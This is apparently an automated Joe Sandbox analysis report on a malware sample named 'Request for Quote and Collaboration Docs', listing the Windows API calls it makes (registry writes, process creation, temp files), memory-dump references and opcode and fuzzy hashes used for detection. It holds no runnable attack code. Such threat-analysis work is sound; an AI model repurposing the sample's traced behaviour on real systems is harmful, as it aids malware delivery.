                                                                                          • Snapshot File: hcaresult_5_2_400000_Request for Quote and Collaboration Docs.jbxd
                                                                                          Similarity
                                                                                          • API ID: ItemTextlstrlenwsprintf
                                                                                          • String ID: %u.%u%s%s
                                                                                          • API String ID: 3540041739-3551169577
                                                                                          • Opcode ID: a87d65089fa2b22b88f3ea6921d71f9a407986b65cfb91be1df2eb5324c2a4fc
                                                                                          • Instruction ID: 6b2e2e184c3c611d12d6b53aa9198873543b26f6782fca7c8cbe4a2e3a07221a
                                                                                          • Opcode Fuzzy Hash: a87d65089fa2b22b88f3ea6921d71f9a407986b65cfb91be1df2eb5324c2a4fc
                                                                                          • Instruction Fuzzy Hash: 1411E2736001243BCB10A66D9C45EEF368D9BC6334F180637FA29F61D1DA799C2186EC
                                                                                          APIs
                                                                                          • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C2A
                                                                                          • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C42
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2599627446.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000005.00000002.2599612827.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599642016.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599657419.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599682680.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599682680.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599682680.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_Request for Quote and Collaboration Docs.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessageSend$Timeout
                                                                                          • String ID: !
                                                                                          • API String ID: 1777923405-2657877971
                                                                                          • Opcode ID: 5e1f230eecded0db815b532ef795033685ed3b5cfc855201c3a552c7fdd4c815
                                                                                          • Instruction ID: 3450dd174e4bd499bd5dd80d9ee349d4783428bbf063aee010979b0fef1ae38f
                                                                                          • Opcode Fuzzy Hash: 5e1f230eecded0db815b532ef795033685ed3b5cfc855201c3a552c7fdd4c815
                                                                                          • Instruction Fuzzy Hash: D8217471A44109BEEF019FB0C94AFAD7B75EF44748F20413AF502B61D1D6B8A941DB18
                                                                                          APIs
                                                                                          • RegCreateKeyExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040236F
                                                                                          • lstrlenW.KERNEL32(0040A580,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 0040238F
                                                                                          • RegSetValueExW.ADVAPI32(?,?,?,?,0040A580,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023CB
                                                                                          • RegCloseKey.ADVAPI32(?,?,?,0040A580,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AC
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2599627446.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000005.00000002.2599612827.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599642016.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599657419.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599682680.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599682680.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599682680.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_Request for Quote and Collaboration Docs.jbxd
                                                                                          Similarity
                                                                                          • API ID: CloseCreateValuelstrlen
                                                                                          • String ID:
                                                                                          • API String ID: 1356686001-0
                                                                                          • Opcode ID: a8bbc55d30affaabc6cd86b2271235a8e32791a35e6a6594074806b6736fc700
                                                                                          • Instruction ID: 3600ae87f41ed0761c30afac485ceb57641edc98565fd21ac0e2bbddf966c716
                                                                                          • Opcode Fuzzy Hash: a8bbc55d30affaabc6cd86b2271235a8e32791a35e6a6594074806b6736fc700
                                                                                          • Instruction Fuzzy Hash: 511160B1A00108BEEB10AFA4DD49EAFBB7CEB50358F10443AF905B61D1D7B85D419B69
                                                                                          APIs
                                                                                            • Part of subcall function 004059E0: CharNextW.USER32(?,?,00424ED8,?,00405A54,00424ED8,00424ED8,00436800,?,76F92EE0,00405792,?,00436800,76F92EE0,00434000), ref: 004059EE
                                                                                            • Part of subcall function 004059E0: CharNextW.USER32(00000000), ref: 004059F3
                                                                                            • Part of subcall function 004059E0: CharNextW.USER32(00000000), ref: 00405A0B
                                                                                          • CreateDirectoryW.KERNEL32(?,?,00000000,0000005C,00000000,000000F0), ref: 004015E3
                                                                                          • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015ED
                                                                                          • GetFileAttributesW.KERNEL32(?,?,00000000,0000005C,00000000,000000F0), ref: 004015FD
                                                                                          • SetCurrentDirectoryW.KERNEL32(?,00435000,?,00000000,000000F0), ref: 00401630
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2599627446.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000005.00000002.2599612827.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599642016.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599657419.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599682680.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599682680.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599682680.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_Request for Quote and Collaboration Docs.jbxd
                                                                                          Similarity
                                                                                          • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                                                                                          • String ID:
                                                                                          • API String ID: 3751793516-0
                                                                                          • Opcode ID: ab4beae8261b44de63f604e0a73f5b1755ddd155d8cc8e63c414e47e0b3a8ad9
                                                                                          • Instruction ID: 793db7a5d63411832aed35bcc9698a3b838560232fc9f0aff2bd133e4d1ca9b1
                                                                                          • Opcode Fuzzy Hash: ab4beae8261b44de63f604e0a73f5b1755ddd155d8cc8e63c414e47e0b3a8ad9
                                                                                          • Instruction Fuzzy Hash: 8E11C271904100EBDF206FA0CD449AF7AB4FF14369B34463BF882B62E1D23D4941DA6E
                                                                                          APIs
                                                                                          • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 00401F17
                                                                                          • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401F39
                                                                                          • GetFileVersionInfoW.VERSION(?,?,00000000,00000000), ref: 00401F50
                                                                                          • VerQueryValueW.VERSION(?,00409014,?,?,?,?,00000000,00000000), ref: 00401F69
                                                                                            • Part of subcall function 00405E31: wsprintfW.USER32 ref: 00405E3E
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2599627446.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000005.00000002.2599612827.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599642016.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599657419.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599682680.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599682680.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599682680.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_Request for Quote and Collaboration Docs.jbxd
                                                                                          Similarity
                                                                                          • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
                                                                                          • String ID:
                                                                                          • API String ID: 1404258612-0
                                                                                          • Opcode ID: 0759821644e88925b44a7e9fb1563554894f113fe06b33f49c2a0c28299a5465
                                                                                          • Instruction ID: 0d64a3d5d22a86ce83a9b45ae5cd800923300da454a86426803db7941f711343
                                                                                          • Opcode Fuzzy Hash: 0759821644e88925b44a7e9fb1563554894f113fe06b33f49c2a0c28299a5465
                                                                                          • Instruction Fuzzy Hash: 76113675A00208AFDB00DFA5C945DAEBBB9EF04344F20407AF905F62A1D7349E50CB68
                                                                                          APIs
                                                                                            • Part of subcall function 00405194: lstrlenW.KERNEL32(004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 004051CC
                                                                                            • Part of subcall function 00405194: lstrlenW.KERNEL32(00402D94,004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 004051DC
                                                                                            • Part of subcall function 00405194: lstrcatW.KERNEL32(004216B0,00402D94,00402D94,004216B0,00000000,00000000,00000000), ref: 004051EF
                                                                                            • Part of subcall function 00405194: SetWindowTextW.USER32(004216B0,004216B0), ref: 00405201
                                                                                            • Part of subcall function 00405194: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405227
                                                                                            • Part of subcall function 00405194: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405241
                                                                                            • Part of subcall function 00405194: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524F
                                                                                            • Part of subcall function 00405665: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004256D8,Error launching installer), ref: 0040568A
                                                                                            • Part of subcall function 00405665: CloseHandle.KERNEL32(?), ref: 00405697
                                                                                          • WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401E80
                                                                                          • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401E95
                                                                                          • GetExitCodeProcess.KERNEL32(?,?), ref: 00401EA2
                                                                                          • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EC9
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2599627446.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000005.00000002.2599612827.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599642016.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599657419.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599682680.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599682680.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599682680.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_Request for Quote and Collaboration Docs.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
                                                                                          • String ID:
                                                                                          • API String ID: 3585118688-0
                                                                                          • Opcode ID: d15ae0a482c79c0d8e7c95f8c2190dddee124483964ec219d5696f0573d40edc
                                                                                          • Instruction ID: 1710045f99402437403c6baccff52884d9c8abed8acdccfc98223cb8aca5cd2d
                                                                                          • Opcode Fuzzy Hash: d15ae0a482c79c0d8e7c95f8c2190dddee124483964ec219d5696f0573d40edc
                                                                                          • Instruction Fuzzy Hash: DC11A171D04204EBCF109FA0CD459DE7AB5EB04318F20447BE505B61E0C3798A82DF99
                                                                                          APIs
                                                                                          • IsWindowVisible.USER32(?), ref: 00405137
                                                                                          • CallWindowProcW.USER32(?,?,?,?), ref: 00405188
                                                                                            • Part of subcall function 0040417B: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040418D
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2599627446.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000005.00000002.2599612827.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599642016.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599657419.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599682680.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599682680.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599682680.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_Request for Quote and Collaboration Docs.jbxd
                                                                                          Similarity
                                                                                          • API ID: Window$CallMessageProcSendVisible
                                                                                          • String ID:
                                                                                          • API String ID: 3748168415-3916222277
                                                                                          • Opcode ID: ffbbbef4bb215af9c79ac16ecb942473111b8a896db240ad95dfeee9b4123394
                                                                                          • Instruction ID: e96fcdb8fef6e8ad8397e3324e9c6cbe2a99463e9dbc89d2689884753c01e048
                                                                                          • Opcode Fuzzy Hash: ffbbbef4bb215af9c79ac16ecb942473111b8a896db240ad95dfeee9b4123394
                                                                                          • Instruction Fuzzy Hash: 9C019E71A00608AFDF215F11DD84FAB3A26EB84354F104136FA007E2E0C37A8C929E69
                                                                                          APIs
                                                                                          • GetTickCount.KERNEL32 ref: 00405BA3
                                                                                          • GetTempFileNameW.KERNEL32(?,?,00000000,?,?,?,00000000,00403358,00436000,00436800), ref: 00405BBE
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2599627446.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000005.00000002.2599612827.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599642016.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599657419.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599682680.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599682680.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599682680.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_Request for Quote and Collaboration Docs.jbxd
                                                                                          Similarity
                                                                                          • API ID: CountFileNameTempTick
                                                                                          • String ID: nsa
                                                                                          • API String ID: 1716503409-2209301699
                                                                                          • Opcode ID: 7054b5fb0d700673de611bc5c70211d8803a17d96c063a26fac21c3c19acc14a
                                                                                          • Instruction ID: ce32066b90f2dd5c00c4c21114408b385ae8a9c1cc04399698be8057c3d71d7e
                                                                                          • Opcode Fuzzy Hash: 7054b5fb0d700673de611bc5c70211d8803a17d96c063a26fac21c3c19acc14a
                                                                                          • Instruction Fuzzy Hash: B7F09676A00204BBDB008F59DC05F9BB7B9EB91710F10803AE901F7180E2B0BD40CB64
                                                                                          APIs
                                                                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004256D8,Error launching installer), ref: 0040568A
                                                                                          • CloseHandle.KERNEL32(?), ref: 00405697
                                                                                          Strings
                                                                                          • Error launching installer, xrefs: 00405678
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2599627446.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000005.00000002.2599612827.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599642016.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599657419.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599682680.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599682680.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599682680.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_Request for Quote and Collaboration Docs.jbxd
                                                                                          Similarity
                                                                                          • API ID: CloseCreateHandleProcess
                                                                                          • String ID: Error launching installer
                                                                                          • API String ID: 3712363035-66219284
                                                                                          • Opcode ID: db986bb620d03a990efffdf1bf116708606012bbbe4d85f78c6f80e4c395a8cb
                                                                                          • Instruction ID: c7c859a2db999ab7639828e98f3e535764a8332e37e79a8a612d2f3195062982
                                                                                          • Opcode Fuzzy Hash: db986bb620d03a990efffdf1bf116708606012bbbe4d85f78c6f80e4c395a8cb
                                                                                          • Instruction Fuzzy Hash: 19E0ECB4A01209AFEB009F64EC49A6B7BBCEB00744B908921A914F2250D778E8108A7D
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2599627446.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000005.00000002.2599612827.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599642016.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599657419.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599682680.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599682680.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599682680.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_Request for Quote and Collaboration Docs.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: fe49718026384e2f2d8d8d283f1539e894bec1c05f027991fc18b2b3d3b0abdf
                                                                                          • Instruction ID: 0bcb7f2cf841bf472a0df6abca0e2eee6c891e9108e2cead3d2ea24e9771fd10
                                                                                          • Opcode Fuzzy Hash: fe49718026384e2f2d8d8d283f1539e894bec1c05f027991fc18b2b3d3b0abdf
                                                                                          • Instruction Fuzzy Hash: D6A15671E00229CBDF28CFA8C854BADBBB1FF44305F15816AD856BB281C7785A96DF44
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2599627446.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000005.00000002.2599612827.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599642016.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599657419.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599682680.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599682680.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599682680.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_Request for Quote and Collaboration Docs.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 7c1b3bbb7fb5d360c352e29dce0ca82793dba8b39a20caf6091836a7e5acd446
                                                                                          • Instruction ID: 5ff8dc76d646c522b35349404ae71f3a07db7e5a5a41cf42f501ef55767b32d6
                                                                                          • Opcode Fuzzy Hash: 7c1b3bbb7fb5d360c352e29dce0ca82793dba8b39a20caf6091836a7e5acd446
                                                                                          • Instruction Fuzzy Hash: DD913470E04229CBEF28CF98C8547ADBBB1FF44305F15816AD852BB291C7789996DF44
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2599627446.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000005.00000002.2599612827.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599642016.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599657419.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599682680.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599682680.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599682680.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_Request for Quote and Collaboration Docs.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 06a588dc36723823e64c1d76eb6b79df0e0f5c7b74692a20a357622d355e40c3
                                                                                          • Instruction ID: bb31d40f455f6cff8f0b7d4569728449f81f985eb729d97d8cba9c35205a948c
                                                                                          • Opcode Fuzzy Hash: 06a588dc36723823e64c1d76eb6b79df0e0f5c7b74692a20a357622d355e40c3
                                                                                          • Instruction Fuzzy Hash: A6814471E04228CBDF24CFA8C844BADBBB1FF44305F25816AD456BB281C7789996DF44
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2599627446.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000005.00000002.2599612827.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599642016.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599657419.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599682680.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599682680.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599682680.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_Request for Quote and Collaboration Docs.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 72aa8ec3dd0942b5b71c471d9b9626f4b4465e3dfbf4f8c787812f56ef585442
                                                                                          • Instruction ID: e59bb743c0d69fedc8ec9c1b53f92d0ee49f9853fc7f4c6d73f4ee5c7875ed1f
                                                                                          • Opcode Fuzzy Hash: 72aa8ec3dd0942b5b71c471d9b9626f4b4465e3dfbf4f8c787812f56ef585442
                                                                                          • Instruction Fuzzy Hash: FE816671E04228DBDF24CFA8C8447ADBBB0FF44305F15816AD856BB281C7786996DF44
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2599627446.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000005.00000002.2599612827.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599642016.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599657419.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599682680.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599682680.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599682680.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_Request for Quote and Collaboration Docs.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 1d7d6eeb6ae866c31b6fd6fb1bb683d5497ea3b6253a7880f6caf84b5ad72384
                                                                                          • Instruction ID: 9556348457f1f5f1301c48e47fc8538a45dff02eab8277f34011f15b85b09a92
                                                                                          • Opcode Fuzzy Hash: 1d7d6eeb6ae866c31b6fd6fb1bb683d5497ea3b6253a7880f6caf84b5ad72384
                                                                                          • Instruction Fuzzy Hash: 43711271E00228DBDF28CF98C854BADBBB1FF48305F15806AD816BB281C7789996DF54
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2599627446.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000005.00000002.2599612827.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599642016.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599657419.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599682680.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599682680.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599682680.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_Request for Quote and Collaboration Docs.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 55af2c983f537d9a3a53cfac4a449f3e0c8fe7d310f5448a54a9ff87f60f3244
                                                                                          • Instruction ID: ef61438920200bd82941886013112b5956151ce3a95704f571d29bdd470ffe0d
                                                                                          • Opcode Fuzzy Hash: 55af2c983f537d9a3a53cfac4a449f3e0c8fe7d310f5448a54a9ff87f60f3244
                                                                                          • Instruction Fuzzy Hash: FF713571E00228DBDF28CF98C854BADBBB1FF44305F15806AD856BB291C7789996DF44
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2599627446.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000005.00000002.2599612827.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599642016.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599657419.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599682680.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599682680.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000005.00000002.2599682680.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_400000_Request for Quote and Collaboration Docs.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 720b16b0405195766e324cd34a7adf45238a3bda3f5e9f89198b3f7d2eee93b7
                                                                                          • Instruction ID: 0528ad5c4640a45b82c18dce6d1929194436f5f2edf35a138e23b2c729619556
                                                                                          • Opcode Fuzzy Hash: 720b16b0405195766e324cd34a7adf45238a3bda3f5e9f89198b3f7d2eee93b7
                                                                                          • Instruction Fuzzy Hash: AD714671E00228DBDF28CF98C854BADBBB1FF44305F15806AD816BB291C778AA56DF44
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2599503034.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_150000_Request for Quote and Collaboration Docs.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: F$F$F$F
                                                                                          • API String ID: 0-1844600021
